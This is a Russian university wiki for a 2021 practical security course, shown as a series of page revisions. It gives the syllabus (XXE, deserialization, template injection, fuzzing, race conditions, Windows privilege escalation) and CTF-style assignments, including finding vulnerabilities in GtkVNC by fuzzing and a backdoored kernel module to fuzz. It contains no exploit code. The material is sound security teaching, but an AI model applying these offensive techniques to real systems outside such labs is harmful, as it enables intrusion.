Дополнительные главы практической безопасности (2021)

2021-05-11T16:36:01Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Гарантируется, что 10000 и больше будут давать оценку "отлично".

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-11T16:35:45Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Гарантируется, что 10000 и больше будут давать оценку "отлично".

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/wiki/LPE-on-Windows.pdf слайды])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)/Задание LPE в Windows

2021-05-11T13:42:51Z

Asterite:

В задании три флага (300, 700 и 1000 баллов), в общей сложности можно получить 2000 баллов.
Суть задачи в том, что вам необходимо повысить свои привилегии на win-системе и получить содержимое файлов-флагов. Для вашего удобства базовый OVA-образ доступен для скачивания. Образ, который используется в таске, отличается от базового только паролем админа и текстом в файлах с флагами.

Вам нужно будет написать программу (исполняемый файл exe), которая получает флаг и печатает его в stdout. При помощи сабмит-системы вы можете отправлять свои программы на запуск и получать результат их выполнения (примерно минут через 10 после запуска), включая stdout. Ваши программы запускаются от пользователя user. Все флаги начинаются с префикса <code>main_FLG</code>.

Адрес задания: http://l.poc.fun:1337/

Для выполнения задания вам потребуется VirtualBox и что-то для сборки программ под windows (я рекомендую VS2019 community edition).

Рекомендуемый порядок выполнения задания:
# Качаете OVA, разворачиваете у себя, загружаетесь, изучаете систему;
# Придумываете, как получить флаг / флаги;
# Пишете программу, которая получает флаг;
# Тестируете её у себя локально;
# Сабмитите в проверялку и получаете реальный флаг.

Если что-то не работает, пишите мне в личку.

PS. Задачки на 300 и 700 баллов совсем простые и вообще не выходят за рамки того, что обсуждалось на семинаре.

Дедлайн по этой задаче: '''23 мая 23:59'''

Дополнительные главы практической безопасности (2021)/Задание LPE в Windows

2021-05-11T13:41:49Z

Asterite:

В задании три флага (300, 700 и 1000 баллов), в общей сложности можно получить 2000 баллов.
Суть задачи в том, что вам необходимо повысить свои привилегии на win-системе и получить содержимое файлов-флагов. Для вашего удобства базовый OVA-образ доступен для скачивания. Образ, который используется в таске, отличается от базового только паролем админа и текстом в файлах с флагами.

Вам нужно будет написать программу (исполняемый файл exe), которая получает флаг и печатает его в stdout. При помощи сабмит-системы вы можете отправлять свои программы на запуск и получать результат их выполнения (примерно минут через 10 после запуска), включая stdout. Ваши программы запускаются от пользователя user. Все флаги начинаются с префикса <code>main_FLG</code>.

Адрес задания: http://l.poc.fun:1337/

Для выполнения задания вам потребуется VirtualBox и что-то для сборки программ под windows (я рекомендую VS2019 community edition).

Рекомендуемый порядок выполнения задания:
1. Качаете OVA, разворачиваете у себя, загружаетесь, изучаете систему;
2. Придумываете, как получить флаг / флаги;
3. Пишете программу, которая получает флаг;
4. Тестируете её у себя локально;
5. Сабмитите в проверялку и получаете реальный флаг.

Если что-то не работает, пишите мне в личку.
PS. Задачки на 300 и 700 баллов совсем простые и вообще не выходят за рамки того, что обсуждалось на семинаре.

Дедлайн по этой задаче: '''23 мая 23:59'''

Дополнительные главы практической безопасности (2021)/Задание LPE в Windows

2021-05-11T13:41:40Z

Asterite: Новая страница: «В задании три флага (300, 700 и 1000 баллов), в общей сложности можно получить 2000 баллов. Суть з…»

В задании три флага (300, 700 и 1000 баллов), в общей сложности можно получить 2000 баллов.
Суть задачи в том, что вам необходимо повысить свои привилегии на win-системе и получить содержимое файлов-флагов. Для вашего удобства базовый OVA-образ доступен для скачивания. Образ, который используется в таске, отличается от базового только паролем админа и текстом в файлах с флагами.

Вам нужно будет написать программу (исполняемый файл exe), которая получает флаг и печатает его в stdout. При помощи сабмит-системы вы можете отправлять свои программы на запуск и получать результат их выполнения (примерно минут через 10 после запуска), включая stdout. Ваши программы запускаются от пользователя user. Все флаги начинаются с префикса <pre>main_FLG</pre>.

Адрес задания: http://l.poc.fun:1337/

Для выполнения задания вам потребуется VirtualBox и что-то для сборки программ под windows (я рекомендую VS2019 community edition).

Рекомендуемый порядок выполнения задания:
1. Качаете OVA, разворачиваете у себя, загружаетесь, изучаете систему;
2. Придумываете, как получить флаг / флаги;
3. Пишете программу, которая получает флаг;
4. Тестируете её у себя локально;
5. Сабмитите в проверялку и получаете реальный флаг.

Если что-то не работает, пишите мне в личку.
PS. Задачки на 300 и 700 баллов совсем простые и вообще не выходят за рамки того, что обсуждалось на семинаре.

Дедлайн по этой задаче: '''23 мая 23:59'''

Дополнительные главы практической безопасности (2021)/Задания

2021-05-11T13:40:57Z

Asterite:

* [[Дополнительные_главы_практической_безопасности_(2021)/Задания по XXE|Задания по XXE]]
* Хотя рождество ещё не скоро, у нас тут уже заранее работает [http://christmas.tasks.course.secsem.ru/ сайт, позволяющий проверить, ждёт ли вас подарок на рождество]. Может это будет флаг?? Исходный код php-файла на этом сайте можно посмотреть, заменив расширение на <code>.phps</code>. Этот таск стоит '''100''' баллов. Дедлаин по нему: '''16 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Домашнее_задание_по_фаззингу|Задания по фаззингу бинарных программ]]
* [[Дополнительные_главы_практической_безопасности_(2021)/Задания_по_темам_первых_четырёх_семинаров|Задания по темам первых четырёх семинаров]]
* [http://206.189.1.230:1337/ Задание по атакам на race condition в веб-приложениях]. Его стоимость: '''1000''' баллов. Дедлаин по этой задаче: '''21 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Задание_LPE_в_Windows|Задание по эскалации привилегий (LPE) в Windows]]

==== Формат заданий ====

В каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему. Для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаги могут иметь разную стоимость. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

==== Сдача флагов ====

Флаги нужно сдавать в [http://dashboard.course.secsem.ru/ принимающую систему]. Флаги могут время от времени меняться, если вы получили флаг, но он не сдаётся, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

==== Поломка заданий ====

Поломка не исключена, если задание не работает, или вы думаете что что-то работает не так, как должно, пишите в чат или мне в телеграм @asterite3.

Дополнительные главы практической безопасности (2021)/Задания

2021-05-11T13:40:28Z

Asterite:

* [[Дополнительные_главы_практической_безопасности_(2021)/Задания по XXE|Задания по XXE]]
* Хотя рождество ещё не скоро, у нас тут уже заранее работает [http://christmas.tasks.course.secsem.ru/ сайт, позволяющий проверить, ждёт ли вас подарок на рождество]. Может это будет флаг?? Исходный код php-файла на этом сайте можно посмотреть, заменив расширение на <code>.phps</code>. Этот таск стоит '''100''' баллов. Дедлаин по нему: '''16 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Домашнее_задание_по_фаззингу|Задания по фаззингу бинарных программ]]
* [[Дополнительные_главы_практической_безопасности_(2021)/Задания_по_темам_первых_четырёх_семинаров|Задания по темам первых четырёх семинаров]]
* [http://206.189.1.230:1337/ Задание по атакам на race condition в веб-приложениях]. Его стоимость: '''1000''' баллов. Дедлаин по этой задаче: '''21 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Задание_LPE_в_Windows|Задание по LPE в Windows]]

==== Формат заданий ====

В каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему. Для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаги могут иметь разную стоимость. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

==== Сдача флагов ====

Флаги нужно сдавать в [http://dashboard.course.secsem.ru/ принимающую систему]. Флаги могут время от времени меняться, если вы получили флаг, но он не сдаётся, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

==== Поломка заданий ====

Поломка не исключена, если задание не работает, или вы думаете что что-то работает не так, как должно, пишите в чат или мне в телеграм @asterite3.

Дополнительные главы практической безопасности (2021)/Задания по XXE

2021-05-08T12:00:07Z

Asterite:

Дополнительные главы практической безопасности (2021)/Задания по темам первых четырёх семинаров

2021-05-08T11:59:38Z

Asterite:

Дополнительные главы практической безопасности (2021)/Задания

2021-05-08T11:59:25Z

Asterite:

* [[Дополнительные_главы_практической_безопасности_(2021)/Задания по XXE|Задания по XXE]]
* Хотя рождество ещё не скоро, у нас тут уже заранее работает [http://christmas.tasks.course.secsem.ru/ сайт, позволяющий проверить, ждёт ли вас подарок на рождество]. Может это будет флаг?? Исходный код php-файла на этом сайте можно посмотреть, заменив расширение на <code>.phps</code>. Этот таск стоит '''100''' баллов. Дедлаин по нему: '''16 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Домашнее_задание_по_фаззингу|Задания по фаззингу бинарных программ]]
* [[Дополнительные_главы_практической_безопасности_(2021)/Задания_по_темам_первых_четырёх_семинаров|Задания по темам первых четырёх семинаров]]
* [http://206.189.1.230:1337/ Задание по атакам на race condition в веб-приложениях]. Его стоимость: '''1000''' баллов. Дедлаин по этой задаче: '''21 мая, 23:59'''

==== Формат заданий ====

В каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему. Для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаги могут иметь разную стоимость. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

==== Сдача флагов ====

Флаги нужно сдавать в [http://dashboard.course.secsem.ru/ принимающую систему]. Флаги могут время от времени меняться, если вы получили флаг, но он не сдаётся, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

==== Поломка заданий ====

Поломка не исключена, если задание не работает, или вы думаете что что-то работает не так, как должно, пишите в чат или мне в телеграм @asterite3.

Дополнительные главы практической безопасности (2021)/Домашнее задание по фаззингу

2021-05-08T11:57:12Z

Asterite: /* Задача */

= Домашнее задание по фаззингу =

== Первый семинар ==

=== Задача ===

http://fuzzing.tasks.course.secsem.ru/

На первом семинаре мы с вами говорили о том, что CTF задачи на бинарную эксплуатацию довольно часто развивают не те навыки, которые востребованы в реальной жизни. Данная задача направлена на развитие ваших навыков автоматизации поиска уязвимостей, диагностики ошибок и написания репортов по найдённым уязвимостям. Для выполнения задачи вам будет предложено искать реальные уязвимости в реальном продукте при помощи фаззинга.

Исследуемый продукт: GtkVNC — клиент для приложений доступа к удалённого экрану, которые используют протокол RFB. [https://tools.ietf.org/html/rfc6143 RFC на протокол]

Для того, чтобы начать искать уязвимости [https://gist.github.com/PaulCher/d4ed9df3e04e0777198538cd36c79a4c достаточно сделать это...]

Правила игры:
Чем больше уязвимостей Вы найдёте в проекте — тем лучше.
Сколько уязвимостей — неизвестно, но они есть.
Если Вы — первый человек, кто нашёл уязвимость данного типа, то мы вместе непублично репортим уязвимость вендору и регистрируем на Вас идентификатор CVE.
Уязвимости, которые приводят к возможности получения удалённого доступа на клиенте оцениваются выше, чем уязвимости, которые приводят к падению клиента (RCE круче, чем DoS).
Уязвимости искать руками тоже можно не используя фаззинг, это не будет контролироваться.

Для того, чтобы подтвердить, что вы действительно нашли уязвимость вам необходимо будет написать минимальный Proof-of-Concept, который необходимо будет сдать в проверяющую систему. Проверяющая система будет запускать ваш PoC и тестировать, что бинарный пакет gtkvnc, скомпилированный с AddressSanitizer выдаёт типичную для ASAN-a ошибку. Если уязвимость, которую вы нашли не триггерит ASAN, но является уязвимостью (например это ошибка неинициализированной памяти, которую клиент удалённо может считать), то пишите в телеграмм paulchr . Такие уязвимость тоже буду засчитаны.

Прежде, чем посылать эксплоит на сервер рекомендуется убедиться, что вы можете получить ошибку локально, подключившись при помощи клиента GtkVNC, который скомпилирован с библиотекой ASAN. После того как вы убедились в этом, посылайте ваш PoC на сервер. Для этого надо зарегистрироваться на нём, выбрать "Targets" -> "GtkVNC" и загрузить скрипт на сервер. Запускаться он будет через ./poc, так что не забудьте шабанг.

Если PoC успешно пройдёт проверку, то он будет переведён из состояния "in progress" в состояние "success", иначе он перейдёт в состояние "failed". Таймаут работы — одна минута, но если вашему скрипту нужно больше времени на работу, чтобы стриггерить уязвимость, так как он, например, посылает много данных, то это поправимо (пишите в телеграмм). Если после загрузки файла на сервер ваш PoC завис в состоянии "in progreess", "created" или "internal error", то пишите в телеграмм, скорее всего что-то сломалось и я постараюсь это почитать как только так сразу. Система тестируется на людях в первый раз.

Если ваш PoC перешёл в состояние success, то поздравляю, вы стриггерили уязвимость, но это не конец. Для успешного завершения упражнения Вам необходимо написать репорт в проверяющую систему где вы опишете подробно насколько это возможно уязвимость и последствия для программы, к которым она приводит. Описание отправляется на ревью (состояние "on review") и может быть отклонено администраторами системы, если репорт был плохо написан. Примеры таких возможных случаев: причина уязвимости была неверно истолкована или непонятно изложена, импакт данной уязвимости был определён неверно, ваш PoC написан не достаточно понятно или обфусцирован или был загружен бинарный исполняемый файл. В таком случае Ваш submission отправляется в состояние "rejected". Если Вы первым смогли стриггерить данную уязвимость, но плохо написали репорт, и человек после Вас получил успешный статус "success", то он будет считаться первым успешно выполнившим задание, а следовательно, будет претендовать на получение идентификатора CVE, даже если Вы потом успешно заново сдали данную уязвимость.

В окружении в котором будет запускаться ваш PoC есть питон3 и библиотека pwntools. [https://gist.github.com/PaulCher/d86d4db6bba67034e1c4de69e9edafd7 Подробнее об устройстве PoC контейнере]

Делиться информацией о найденных уязвимостях ни с кем категорически нельзя до конца задания!

'''Дедлаин по этой задаче: 16 мая 23:59:59'''

=== Вспомогательные материалы ===

* [https://github.com/google/AFL/ AFL]
* [https://github.com/google/AFL/blob/master/docs/technical_details.txt AFL technical_details.txt]
* [https://llvm.org/docs/LibFuzzer.html Базовая справка по libFuzzer]
* [https://github.com/Dor1s/libfuzzer-workshop Хороший воркшоп про libFuzzer]
* [https://github.com/google/sanitizers/wiki/AddressSanitizer Документация AddressSanitizer]
* [https://github.com/llvm-mirror/compiler-rt/blob/master/test/fuzzer/AbsNegAndConstant64Test.cpp Пример интересного теста из libFuzzer (да, он и такое умеет)]
* [https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/ Пример фаззинга реального приложения от и до]
* [https://github.com/google/fuzzing/blob/master/tutorial/libFuzzerTutorial.md libFuzzer tutorial]

=== FAQ по домашке ===

* Что делать если "Internal Error"?

Писать в чат в телегремме. На сервере иногда случаются докер-проблемы, но всё что отработало с "Internal Error" будет перепроверено и засчитано.

* Почему мы откатываемся на какой-то коммит? Неужели ты нас обманул и мы ищем уже запатченные уязвимости?

Нет, на коммит я откатился, потому что на нём я тестировал свой фаззер и вместе с ним сбилжен тестовый билд с ASAN-ом на котором проверяются ваши эксплоиты. Соответственно вам тоже удобнее будет тестировать не на последнем коммите, потому что если в проекте с тех пор появились какие-то обновления, то они могут помешать и вы не поймёте что случилось.

* У тебя там тестируется всё локально, поэтому я могу наверное как-то обмануть проверяющую систему и мне засчитается submission?

Скорее всего это не получится. Контейнеры, в которых запускаются ваш PoC и уязвимый бинарь, изолированы друг от друга и от общей докеровской сети. Кстати, в связи с этим будьте внимательны: ваш PoC должен слушать порт 5900 не на 127.0.0.1, а на 0.0.0.0

* Экслоит не работает. Что делать?

Сбилдить указанный коммит с ASAN-ом и проверить руками свой пок.

* Эксплоит работает локально, но не работает удалённо. Что делать?

Проверьте различные проблемы. Проверьте, что первой строчкой в вашем поке идёт шебанг. Вы используете питон версии 3. Ваш пок не использует лишних библиотек. Если вы сидите на винде, то замените все переводы строк с CRLF на LF. Если всё это не работает, то пишите в чат в телеграмме.

* Что должен содержать минимальный репорт?

Подробное описание где конкретно проижошла уязвимость с именами файлов, функций и номерами строк. Что привело к уязвимости: понятное и точное описание с именами переменных. Импакт от данной уязвимости. Может ли данная уязвимость привести к возможности удалённого исполнения кода. Если для этого будут требоваться другие уязвимости, то написать какие именно (например, memory leak). Если при описании импакта Вы не уверены на 100%, то можно написать об этом. Идентификатор [https://cwe.mitre.org/ CWE].

* Где создать репорт?

После того, как ваш PoC отработал со статусом "success" кнопка "Create Report" будет находиться на полной странице вашего submission_a. Там же впоследствии появится комментарий проверяющего после ревью.

== Второй семинар ==

== Третий семинар ==

На третьем семинаре мы говорили о фаззинге бинарных программ на уровне ядра.

=== Задача ===

Дан [https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing_3_hw.zip небольшой ядерный модуль] для Linux 5.4.0-72 (такое ядро есть, например, на полностью обновлённой Ubuntu 20.04). Его можно загрузить с помощью команды <code>insmod</code>. Модуль реализует простейшее устройство, принимающее файл конфигурации и возвращающее значение параметра из него. Для взаимодействия с ним можно создать устройство в файловой системе: после insmod посмотрите в выводе dmesg, какой "major device number" получило устройство test. У меня этот номер равен 241, дальше буду использовать его. Для создания файла устройства выполните команду <code>mknod /dev/test c 241 0</code>. После этого с модулем можно общаться через файл <code>/dev/test</code>. Для примера, сделайте <code>echo '{"param1": "123456"}' > /dev/test && head -c 6 /dev/test</code>.

В модуле есть "закладка", вам предлагается найти её с помощью фаззинга. Скачайте kAFL (официальный репозиторий располагается [https://github.com/IntelLabs/kAFL тут], но я советую использовать мою ветку ip_decoder_fix [https://github.com/vient/kAFL отсюда]): <code>git clone https://github.com/vient/kAFL && cd kAFL && git checkout ip_decoder_fix</code>. После этого воспользуйтесь [https://github.com/vient/kAFL/blob/ip_decoder_fix/doc/TUTORIAL.Installation.md мануалами] и [https://github.com/vient/kAFL/blob/ip_decoder_fix/doc/TUTORIAL.Linux_fuzzing.md документацией] для подготовки окружения и фаззинга. Обратите внимание, что kAFL не будет работать в виртуальной машине!

Для сдачи задания вам нужно прислать тест-триггер уязвимости и описание, как высокоуровнево устроен бекдор, на [mailto:vient@seclab.cs.msu.ru мою почту]. С вопросами по поводу дз можно писать мне в телеграм @vient.

'''Дедлаин по этой задаче: 16 мая 23:59:59'''

Дополнительные главы практической безопасности (2021)/Домашнее задание по фаззингу

2021-05-08T11:57:05Z

Asterite: /* Задача */

= Домашнее задание по фаззингу =

== Первый семинар ==

=== Задача ===

http://fuzzing.tasks.course.secsem.ru/

На первом семинаре мы с вами говорили о том, что CTF задачи на бинарную эксплуатацию довольно часто развивают не те навыки, которые востребованы в реальной жизни. Данная задача направлена на развитие ваших навыков автоматизации поиска уязвимостей, диагностики ошибок и написания репортов по найдённым уязвимостям. Для выполнения задачи вам будет предложено искать реальные уязвимости в реальном продукте при помощи фаззинга.

Исследуемый продукт: GtkVNC — клиент для приложений доступа к удалённого экрану, которые используют протокол RFB. [https://tools.ietf.org/html/rfc6143 RFC на протокол]

Для того, чтобы начать искать уязвимости [https://gist.github.com/PaulCher/d4ed9df3e04e0777198538cd36c79a4c достаточно сделать это...]

Правила игры:
Чем больше уязвимостей Вы найдёте в проекте — тем лучше.
Сколько уязвимостей — неизвестно, но они есть.
Если Вы — первый человек, кто нашёл уязвимость данного типа, то мы вместе непублично репортим уязвимость вендору и регистрируем на Вас идентификатор CVE.
Уязвимости, которые приводят к возможности получения удалённого доступа на клиенте оцениваются выше, чем уязвимости, которые приводят к падению клиента (RCE круче, чем DoS).
Уязвимости искать руками тоже можно не используя фаззинг, это не будет контролироваться.

Для того, чтобы подтвердить, что вы действительно нашли уязвимость вам необходимо будет написать минимальный Proof-of-Concept, который необходимо будет сдать в проверяющую систему. Проверяющая система будет запускать ваш PoC и тестировать, что бинарный пакет gtkvnc, скомпилированный с AddressSanitizer выдаёт типичную для ASAN-a ошибку. Если уязвимость, которую вы нашли не триггерит ASAN, но является уязвимостью (например это ошибка неинициализированной памяти, которую клиент удалённо может считать), то пишите в телеграмм paulchr . Такие уязвимость тоже буду засчитаны.

Прежде, чем посылать эксплоит на сервер рекомендуется убедиться, что вы можете получить ошибку локально, подключившись при помощи клиента GtkVNC, который скомпилирован с библиотекой ASAN. После того как вы убедились в этом, посылайте ваш PoC на сервер. Для этого надо зарегистрироваться на нём, выбрать "Targets" -> "GtkVNC" и загрузить скрипт на сервер. Запускаться он будет через ./poc, так что не забудьте шабанг.

Если PoC успешно пройдёт проверку, то он будет переведён из состояния "in progress" в состояние "success", иначе он перейдёт в состояние "failed". Таймаут работы — одна минута, но если вашему скрипту нужно больше времени на работу, чтобы стриггерить уязвимость, так как он, например, посылает много данных, то это поправимо (пишите в телеграмм). Если после загрузки файла на сервер ваш PoC завис в состоянии "in progreess", "created" или "internal error", то пишите в телеграмм, скорее всего что-то сломалось и я постараюсь это почитать как только так сразу. Система тестируется на людях в первый раз.

Если ваш PoC перешёл в состояние success, то поздравляю, вы стриггерили уязвимость, но это не конец. Для успешного завершения упражнения Вам необходимо написать репорт в проверяющую систему где вы опишете подробно насколько это возможно уязвимость и последствия для программы, к которым она приводит. Описание отправляется на ревью (состояние "on review") и может быть отклонено администраторами системы, если репорт был плохо написан. Примеры таких возможных случаев: причина уязвимости была неверно истолкована или непонятно изложена, импакт данной уязвимости был определён неверно, ваш PoC написан не достаточно понятно или обфусцирован или был загружен бинарный исполняемый файл. В таком случае Ваш submission отправляется в состояние "rejected". Если Вы первым смогли стриггерить данную уязвимость, но плохо написали репорт, и человек после Вас получил успешный статус "success", то он будет считаться первым успешно выполнившим задание, а следовательно, будет претендовать на получение идентификатора CVE, даже если Вы потом успешно заново сдали данную уязвимость.

В окружении в котором будет запускаться ваш PoC есть питон3 и библиотека pwntools. [https://gist.github.com/PaulCher/d86d4db6bba67034e1c4de69e9edafd7 Подробнее об устройстве PoC контейнере]

Делиться информацией о найденных уязвимостях ни с кем категорически нельзя до конца задания!

'''Дедлаин по этой задаче: 16 мая 23:59:59'''

=== Вспомогательные материалы ===

* [https://github.com/google/AFL/ AFL]
* [https://github.com/google/AFL/blob/master/docs/technical_details.txt AFL technical_details.txt]
* [https://llvm.org/docs/LibFuzzer.html Базовая справка по libFuzzer]
* [https://github.com/Dor1s/libfuzzer-workshop Хороший воркшоп про libFuzzer]
* [https://github.com/google/sanitizers/wiki/AddressSanitizer Документация AddressSanitizer]
* [https://github.com/llvm-mirror/compiler-rt/blob/master/test/fuzzer/AbsNegAndConstant64Test.cpp Пример интересного теста из libFuzzer (да, он и такое умеет)]
* [https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/ Пример фаззинга реального приложения от и до]
* [https://github.com/google/fuzzing/blob/master/tutorial/libFuzzerTutorial.md libFuzzer tutorial]

=== FAQ по домашке ===

* Что делать если "Internal Error"?

Писать в чат в телегремме. На сервере иногда случаются докер-проблемы, но всё что отработало с "Internal Error" будет перепроверено и засчитано.

* Почему мы откатываемся на какой-то коммит? Неужели ты нас обманул и мы ищем уже запатченные уязвимости?

